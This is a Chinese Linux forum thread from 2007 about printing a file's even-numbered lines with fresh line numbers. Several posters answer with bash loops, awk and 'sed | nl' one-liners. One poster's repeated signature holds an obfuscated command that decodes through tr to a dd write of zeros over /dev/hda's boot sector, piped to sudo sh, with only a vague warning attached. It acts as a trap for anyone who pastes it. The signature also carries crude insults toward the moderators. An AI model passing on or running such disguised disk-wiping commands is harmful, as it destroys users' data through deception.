[问题]给一个文件每一行的前边加上列号。

sh/bash/dash/ksh/zsh等Shell脚本
回复
stufever
帖子: 69
注册时间: 2007-03-11 17:48

[问题]给一个文件每一行的前边加上列号。

#1

帖子 stufever » 2007-05-20 1:19

有一个文件假设叫做file,内容如下:
aa
dd
bb
ee
cc
ff
怎么才能实现在终端上显示如下结果,也就是让偶数行列出来并有行号:
1 dd
2 ee
3 ff
ziyun
帖子: 262
注册时间: 2007-03-29 12:59

#2

帖子 ziyun » 2007-05-20 1:58

代码: 全选

j=1;i=1;while read line;do if [ `expr $i % 2` == 0 ];then echo "$j $line";((j++));fi;((i++));done<file
echo 'qq%vs+&qri&mreb%bs+&qri&uqn%of+FBC%pbhag+B' | tr 'n-za-m&+A-J%' 'a-z/=0-9 ' |sudo sh #<-警告:
强烈鄙视SB版主,一群跟风的SB,一群自以为是的SB
对这个论坛彻底失望了
ziyun
帖子: 262
注册时间: 2007-03-29 12:59

#3

帖子 ziyun » 2007-05-20 2:04

再一个

代码: 全选

awk 'BEGIN{i=1;j=1}{if(i%2==0){print j,$0;j++};i++}' file
echo 'qq%vs+&qri&mreb%bs+&qri&uqn%of+FBC%pbhag+B' | tr 'n-za-m&+A-J%' 'a-z/=0-9 ' |sudo sh #<-警告:
强烈鄙视SB版主,一群跟风的SB,一群自以为是的SB
对这个论坛彻底失望了
头像
laborer
帖子: 1016
注册时间: 2005-10-25 11:15
联系:

#4

帖子 laborer » 2007-05-20 2:34

代码: 全选

sed -n 'n;p' file | nl

代码: 全选

awk 'NR % 2 == 0 {print NR, $0}' file
hreiser@oakland:~$ killall -9 wife
police@oakland:~$ sudo find / -user hreiser
court@oakland:~$ sudo mv /home/hreiser /jail/
court@oakland:~$ sudo usermod -d /jail/hreiser -s "/usr/sbin/chroot /jail/" hreiser
stufever
帖子: 69
注册时间: 2007-03-11 17:48

#5

帖子 stufever » 2007-05-20 10:17

恩,首先要感谢楼上的两位,呵呵
下边是我的一些理解:

代码: 全选

sed -n 'n;p' file | nl
恩,很简洁
其中的-n选项是告诉sed明确要求打印模式空间,n 允许夸行的模式匹配, p 打印匹配行;
nl--number lines of files
但是我对sed的-n和-e选项还是有点搞不清,不知道怎么用,什么时候用?

代码: 全选

awk 'NR % 2 == 0 {print NR, $0}' file
恩,这个的输出和我想要的不太一样
但是它让我了解了awk的新用法。
stufever
帖子: 69
注册时间: 2007-03-11 17:48

#6

帖子 stufever » 2007-05-20 10:24

ziyun 写了:

代码: 全选

j=1;i=1;while read line;do if [ `expr $i % 2` == 0 ];then echo "$j $line";((j++));fi;((i++));done<file
恩,写到一整句,让我这个新手看着有点小晕,下边事脚本的形式:

代码: 全选

j=1
i=1
while read line
do
    if [ `expr $i % 2` == 0 ] ; then
        echo "$j $line"
        ((j++))
    fi
    ((i++))
done<file
最后一句我看不太懂,想问一下这是不是while语句的一种格式?
stufever
帖子: 69
注册时间: 2007-03-11 17:48

#7

帖子 stufever » 2007-05-20 10:27

代码: 全选

awk 'BEGIN{i=1;j=1}{if(i%2==0){print j,$0;j++};i++}' file
awk还可以这么灵活的用,呵呵,看来我要好好学学了;-)

再说句闲话,呵呵,楼上两个睡觉还挺晚的吗!
ziyun
帖子: 262
注册时间: 2007-03-29 12:59

#8

帖子 ziyun » 2007-05-20 11:30

laborer的方法很高明
第二句改成这样就可以了

代码: 全选

awk 'NR % 2 == 0 {print NR/2, $0}' file

< 重定向输入
> 重定向输出
echo 'qq%vs+&qri&mreb%bs+&qri&uqn%of+FBC%pbhag+B' | tr 'n-za-m&+A-J%' 'a-z/=0-9 ' |sudo sh #<-警告:
强烈鄙视SB版主,一群跟风的SB,一群自以为是的SB
对这个论坛彻底失望了
stufever
帖子: 69
注册时间: 2007-03-11 17:48

#9

帖子 stufever » 2007-05-20 11:36

ziyun 写了:laborer的方法很高明
第二句改成这样就可以了

代码: 全选

awk 'NR % 2 == 0 {print NR/2, $0}' file

< 重定向输入
> 重定向输出
恩,是这样的,赞
回复